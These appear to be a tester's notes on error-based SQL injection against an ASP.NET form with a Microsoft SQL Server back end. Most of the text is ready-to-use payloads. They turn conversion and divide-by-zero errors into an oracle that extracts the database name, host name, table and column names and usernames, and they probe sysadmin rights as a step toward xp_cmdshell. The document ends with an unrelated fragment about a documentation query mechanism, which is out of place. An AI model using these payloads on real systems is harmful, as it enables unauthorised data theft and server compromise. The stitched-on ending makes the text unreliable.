# ERROR BASED There is a form. SQL Injection. ``` ' - Error '' - Error disappears ``` It should be MSSQL. Because of ASP.NET web service. Try that. Specify String Concatenation ``` '+(SELECT '')+' ``` You can also exploit this behavior to test conditions. ``` '+(SELECT CASE WHEN (1=2) THEN 1/0 ELSE NULL END)+' ``` We can see error page. So we can try using transformation errors than time based errors. ``` '+convert(id,db_name())+' ERROR '+convert(char,db_name())+' OK '+convert(char,(SELECT IIF(SUBSTRING(DB_NAME(),1,1)='A',3,@@VERSION)))+' ``` This query was working as this: * Sub-stringing the database name starting from 1st character within 1 length and comparing within ‘A’ character whether it equals or not. * If that character equals to ‘A’, then it returns 3 as integer. * Converting ‘3’ as integer to char is successful and returns without any errors, meaning that the query is true. * If the character does not equal to ‘A’, then it returns @@VERSION as T-SQL functionality. * Converting @@VERSION result to char is not successful and returns error (Error.aspx page), meaning that the query is false! ``` '+convert(char,(SELECT IIF(SUBSTRING(HOST_NAME(),1,1)='A',3,@@VERSION)))+' Microsoft SQL Server 2017 (RTM) ``` ``` %2bconvert(char,(SELECT IIF(SUBSTRING((***query_here***),1,1)='d',3,@@VERSION)))%2b '+convert(char,(SELECT IIF(SUBSTRING((select top 1 table_name from INFORMATION_SCHEMA.tables),1,1)='A',3,@@VERSION)))+' ``` ``` '+convert(int,(user_name()))+' - testuser '+(SELECT CASE WHEN (is_srvrolemember('sysadmin', 'testuser')=0) THEN 1/0 ELSE NULL END)+' - Nope '+(SELECT CASE WHEN (is_srvrolemember('sysadmin')=1) THEN 1/0 ELSE NULL END)+' - True ``` :( - If it is equal to 1, we can execute xp\_cmdshell command. So we can not execute the command anyways. ``` '+(convert(int,(select top 1 table_name from information_schema.tables)))+' ``` The above query will retrieve the top table\_name from the database. Conversion failed when converting the nvarchar value 'users' to data type int. Got a good table if not, ``` convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Download_Document','login_audit'))) - Keep going find a proper table name ``` ``` '+convert(int,(select top 1 column_name from information_schema.columns where table_name='users'))+' '+convert(int,(select top 1 column_name from information_schema.columns where column_name not in ('col1','col2','col3')))+' '+convert(int,(select top 1 username from users))+' '+convert(int,(select top 1 username from users where username not in ('user1','user2'')))+' ``` #### Different Approach ``` '+convert(int,(SELECT top 1 DB_NAME(6)))+' archive '+convert(int,(SELECT top 1 DB_NAME(6)))+' Getting other db - DB_NAME(i) 0 ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.